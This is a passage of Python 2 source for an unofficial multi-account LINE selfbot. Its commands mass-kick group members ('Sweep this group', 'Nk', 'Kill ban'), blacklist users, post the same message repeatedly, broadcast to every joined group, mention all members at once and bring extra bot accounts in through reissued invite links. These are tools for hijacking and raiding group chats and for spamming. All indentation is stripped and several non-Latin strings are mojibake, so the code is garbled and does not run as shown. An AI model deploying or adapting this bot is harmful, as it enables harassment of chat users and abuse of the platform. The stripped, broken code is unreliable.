cl.sendText(msg.to,"display name : " + msg.contentMetadata["displayName"] + "\n\nmid : " + msg.contentMetadata["mid"] + "\n\nstatus message : " + contact.statusMessage + "\n\ndisplay picture : http://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\ncover URL : " + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"display name : " + msg.contentMetadata["displayName"] + "\n\nmid : " + msg.contentMetadata["mid"] + "\n\nstatus message : " + contact.statusMessage + "\n\ndisplay picture : http://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\ncover URL : " + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text.lower() == 'set group':
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
cl.kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "inv: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("inv: ","")
if gid == "":
cl.sendText(msg.to,"invalid group id.")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
cl.sendText(msg.to,"invited.")
except:
cl.sendText(msg.to,"you are has been invited.")
elif "leave: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("leave: ","")
if gid == "":
cl.sendText(msg.to,"invalid group id.")
else:
try:
cl.leaveGroup(gid)
cl.sendText(msg.to,"Bot leaving the group.")
except:
cl.sendText(msg.to,"Bot has left the group.")
elif msg.text in ["Bot?"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
elif msg.text in ["Creator","creator"]:
msg.contentType = 13
cl.sendText(msg.to, "Created By: BABANG_Adhi")
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg)
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Open url","open url"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite by link open")
else:
cl.sendText(msg.to,"Already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Close url","close url"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite by link Close")
else:
cl.sendText(msg.to,"Already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"group name :\n" + str(ginfo.name) + "\n\ngid :\n" + msg.to + "\n\ngroup creator :\n" + gCreator + "\n\nprofile status :\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nmembers : " + str(len(ginfo.members)) + " members\npending : " + sinvitee + " people\nQR/Link : " + u + " it is inside")
else:
cl.sendText(msg.to,"group name :\n" + str(ginfo.name) + "\n\ngid :\n" + msg.to + "\n\ngroup creator :\n" + gCreator + "\n\nprofile status :\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nmembers : " + str(len(ginfo.members)) + " members\npending : " + sinvitee + " people\nQR/Link : " + u + " it is inside")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text.lower() == "id group":
cl.sendText(msg.to,msg.to)
elif msg.text.lower() == "my mid":
cl.sendText(msg.to, msg.from_)
elif msg.text.lower() == "Mid all":
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Mc "]:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancl on","cancl on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancl off","cancl off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gr on","gr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gr off","gr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join:on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join:off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["共有:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Set","View"]:
if msg.from_ in admin:
md = ""
if wait["Protectjoin"] == True: md+="lock Block Join\n"
else: md+=" Block Join Off\n"
if wait["Protectgr"] == True: md+="lock Block Group\n"
else: md+=" Block Group Off\n"
if wait["Protectcancl"] == True: md+="lock Cancel All Invited\n"
else: md+=" Cancel All Invited Off\n"
if wait["contact"] == True: md+=" Contact : on\n"
else: md+=" Contact : off\n"
if wait["autoJoin"] == True: md+=" Auto join : on\n"
else: md +=" Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel : off\n"
if wait["leaveRoom"] == True: md+=" Auto leave : on\n"
else: md+=" Auto leave : off\n"
if wait["timeline"] == True: md+=" Share : on\n"
else:md+=" Share : off\n"
if wait["autoAdd"] == True: md+=" Auto add : on\n"
else:md+=" Auto add : off\n"
if wait["commentOn"] == True: md+=" Comment : on\n"
else:md+=" Comment : off\n"
cl.sendText(msg.to,md)
elif msg.text.lower() in ["Group id"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[ %s ] :\n%s\n\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text.lower() == 'cek':
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text.lower() == 'sider':
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "Readers:\n%s\nDate and time:\n[%s]" % (chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Type 'cek' to set point.")
#-----------------------------------------------
#-----------------------------------------------
#----------------Join Group Function Start-----------------------#
elif msg.text in ["join","Masuk"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Bot Complete"
elif msg.text in ["Ard join"]:
if msg.from_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Ard1 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Ard2 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Ard3 join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Join Group Function Finish---------------#
#-------------Leave Group Function Start---------------#
elif msg.text in ["Bye bots"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = ki.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ard"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
#-------------Leave Group Function Finish---------------#
#-------------Tag All Function Start---------------#
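# Builds a single LINE "mention" message: cb collects JSON spans {"S","E","M"} marking where each
# "@nrik " placeholder sits in cb2, so every group member is tagged at once via the MENTION metadata.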
elif msg.text in ["Hay","Tagall"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-------------Tag All Function Finish---------------#
#----------------Banned Kick Target Function Start-----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
kk.sendText(msg.to,"Good Bye")
return
for jj in matched_list:
try:
klist=[ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Banned Kick Target Function Finish----------------------#
elif "Sweep this group" in msg.text.lower():
if msg.from_ in admsa:
if msg.toType == 2:
print "sweeping"
_name = msg.text.replace("Sweep this group","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid' :'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
if target not in admin:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
pass
#----------------Kick User Target Function Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
if target not in Bots:
if target not in admin:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
ki.sendText(msg.to, "Good bye.")
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
pass
#----------------Kick User Target Function Finish----------------------#
#elif "Blacklist @" in msg.text:
#_name = msg.text.replace("Blacklist @","")
#_kicktarget = _name.rstrip(' ')
#gs = ki2.getGroup(msg.to)
#targets = []
#for g in gs.members:
#if _kicktarget == g.displayName:
#targets.append(g.mid)
#if targets == []:
#cl.sendText(msg.to,"Not found")
#else:
#for target in targets:
#try:
#wait["blacklist"][target] = True
#f=codecs.open('st2__b.json','w','utf-8')
#json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#k3.sendText(msg.to,"Target locked.")
#except:
#ki.sendText(msg.to,"error")
#----------------Banned User Target Function Start-----------------------#
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] executed"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if any(target in Bots for target in targets):
cl.sendText(msg.to,"Can't ban bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target locked.")
print "[Banned] success"
except:
ki.sendText(msg.to,"Target already in blacklist.")
#----------------Banned User Target Function Finish-----------------------#
#----------------Unbanned User Target Function Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] executed"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Target not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target cleaned.")
print "[Unban] success"
except:
ki.sendText(msg.to,"There's no target in blacklist.")
#----------------Unbanned User Target Function Finish-----------------------#
#-------------Spam Function Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
#-------------Spam Function Finish---------------------#
#-------------Broadcast Function Start------------#
elif "Bc " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bc ","")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia, (bctxt))
#--------------Broadcast Function Finish-----------#
elif msg.text in ["Cv say hi"]:
ki.sendText(msg.to,"Hi buddy Har Har")
kk.sendText(msg.to,"Hi buddy Har Har")
kc.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["dul","dul"]:
cl.sendText(msg.to,"Ya? Type 'help' for help message.")
#-----------------------------------------------
#-------------Response Function Start---------------------#
elif msg.text in ["Get ready"]:
if msg.from_ in admin:
cl.sendText(msg.to,"I'm ready")
ki.sendText(msg.to,"I'm ready")
kk.sendText(msg.to,"I'm ready")
kc.sendText(msg.to,"I'm ready")
#-------------Response Function Finish---------------------#
#-------------Response Reply Function Finish---------------------#
#-------------Speedbot Function Start---------------------#
elif msg.text in ["Speedbot","speedbot"]:
start = time.time()
cl.sendText(msg.to, "please wait...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%ss" % (elapsed_time))
#-------------Speedbot Function Finish---------------------#
#-------------Banned Send Contact Function Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#-------------Banned Send Contact Function Finish------------------#
#-------------Banlist Function Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"There's no banned user")
else:
ki.sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Banlist Function Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.sendText(msg.to,"Good bye.")
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
kk.kickoutFromGroup(msg.to,[jj])
kc.kickoutFromGroup(msg.to,[jj])
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif msg.text in ["Bot Like", "Bot like"]:
if msg.from_ in admin:
print "[Command]Like executed"
cl.sendText(msg.to,"Trying to Like post(s)")
try:
likePost()
except:
pass
elif msg.text.lower() == 'ard out all':
if msg.from_ in admsa:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
for i in gid:
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"dudul bot leaving all groups.")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text.lower() == 'ard out':
if msg.from_ in admsa:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ard bot leaving all groups.")
else:
cl.sendText(msg.to,"He declined all invitations")
elif "Group pict" in msg.text.lower():
print "[command]steal executing"
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
print "[command]steal executed"
elif "Mid @" in msg.text:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif msg.text.lower() in ["List group"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" → ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif "Staff add @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff add executing"
_name = msg.text.replace("Staff add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Staff added")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Staff remove @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff remove executing"
_name = msg.text.replace("Staff remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
